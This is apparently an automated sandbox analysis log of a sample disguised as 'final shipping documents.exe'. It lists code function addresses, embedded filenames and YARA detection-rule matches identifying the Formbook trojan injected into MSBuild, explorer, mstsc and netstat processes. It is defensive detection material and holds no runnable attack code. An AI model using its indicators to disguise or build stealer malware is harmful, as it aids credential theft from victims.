Source: C:\Windows\explorer.exe	Code function: 10_2_1092D082	10_2_1092D082
Source: C:\Windows\explorer.exe	Code function: 10_2_10936036	10_2_10936036
Source: C:\Windows\explorer.exe	Code function: 10_2_1093A5CD	10_2_1093A5CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10934912	10_2_10934912
Source: C:\Windows\explorer.exe	Code function: 10_2_1092ED02	10_2_1092ED02
Source: C:\Windows\explorer.exe	Code function: 10_2_10937232	10_2_10937232
Source: C:\Windows\explorer.exe	Code function: 10_2_10931B32	10_2_10931B32
Source: C:\Windows\explorer.exe	Code function: 10_2_10931B30	10_2_10931B30
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_027DE0CC	11_2_027DE0CC
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AD5D40	11_2_06AD5D40
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06ADD620	11_2_06ADD620
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06ADF0F1	11_2_06ADF0F1
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06ADF100	11_2_06ADF100
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06ADFAB0	11_2_06ADFAB0
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06ADDA58	11_2_06ADDA58
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AD4B20	11_2_06AD4B20
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AD4B30	11_2_06AD4B30
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AE75E8	11_2_06AE75E8
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AE9F50	11_2_06AE9F50
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AE4590	11_2_06AE4590
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AE75E1	11_2_06AE75E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01090100	15_2_01090100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010E6000	15_2_010E6000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010AE3F0	15_2_010AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_011202C0	15_2_011202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A0535	15_2_010A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010F65B2	15_2_010F65B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010F65D0	15_2_010F65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010C4750	15_2_010C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A0770	15_2_010A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010BC6E0	15_2_010BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010B6962	15_2_010B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010AA840	15_2_010AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010D8890	15_2_010D8890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010928F0	15_2_010928F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010868F1	15_2_010868F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010CE8F0	15_2_010CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A2A45	15_2_010A2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0109EA80	15_2_0109EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010AAD00	15_2_010AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010AED7A	15_2_010AED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010B8DBF	15_2_010B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A8DC0	15_2_010A8DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A0C00	15_2_010A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01090CF2	15_2_01090CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010E2F28	15_2_010E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010C0F30	15_2_010C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01114F40	15_2_01114F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0111EFA0	15_2_0111EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01092FC8	15_2_01092FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A0E59	15_2_010A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010B2ED9	15_2_010B2ED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010D516C	15_2_010D516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0108F172	15_2_0108F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010AB1B0	15_2_010AB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A33F3	15_2_010A33F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A52A0	15_2_010A52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010BD2F0	15_2_010BD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A3497	15_2_010A3497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010E74E0	15_2_010E74E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010AB730	15_2_010AB730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A9950	15_2_010A9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010BB950	15_2_010BB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01091979	15_2_01091979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A59DA	15_2_010A59DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0110D800	15_2_0110D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A38E0	15_2_010A38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010BFB80	15_2_010BFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01115BF0	15_2_01115BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010DDBF9	15_2_010DDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01113A6C	15_2_01113A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A3D40	15_2_010A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010BFDC0	15_2_010BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01119C32	15_2_01119C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010B9C20	15_2_010B9C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A1F92	15_2_010A1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010A9EB0	15_2_010A9EB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01AEF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01AB7E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0110EA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01A5B970 appears 277 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01ADEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 01AA5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 010E7E54 appears 97 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4056 -s 6976

Source: final shipping documents.exe, 00000000.00000002.1504736152.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs final shipping documents.exe
Source: final shipping documents.exe, 00000000.00000002.1509818567.0000000008A70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs final shipping documents.exe
Source: final shipping documents.exe, 00000000.00000002.1508959820.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs final shipping documents.exe
Source: final shipping documents.exe, 00000000.00000000.1449912758.0000000000882000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGldQ.exe< vs final shipping documents.exe
Source: final shipping documents.exe, 00000000.00000002.1509369417.0000000007457000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGldQ.exe< vs final shipping documents.exe
Source: final shipping documents.exe, 00000000.00000002.1503919058.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs final shipping documents.exe
Source: final shipping documents.exe, 00000000.00000002.1504736152.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs final shipping documents.exe
Source: final shipping documents.exe, 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs final shipping documents.exe
Source: final shipping documents.exe	Binary or memory string: OriginalFilenameGldQ.exe< vs final shipping documents.exe

Source: final shipping documents.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: final shipping documents.exe PID: 3628, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 6156, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: GcrdXwPgmZ.exe PID: 6664, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: mstsc.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 7592, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: final shipping documents.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GcrdXwPgmZ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: *.sln
